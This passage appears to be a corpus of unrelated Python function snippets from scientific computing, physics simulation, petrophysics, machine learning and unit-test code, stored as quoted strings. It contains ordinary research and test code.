self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n 
Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 
3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = 
mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for 
XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. 
Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def _r_inv(self):\n raise NotImplementedError", "def test_put_nveto_pmt_item(self):\n pass", "def prove_I0() -> Proof:\n # Task 4.8", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n 
h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# 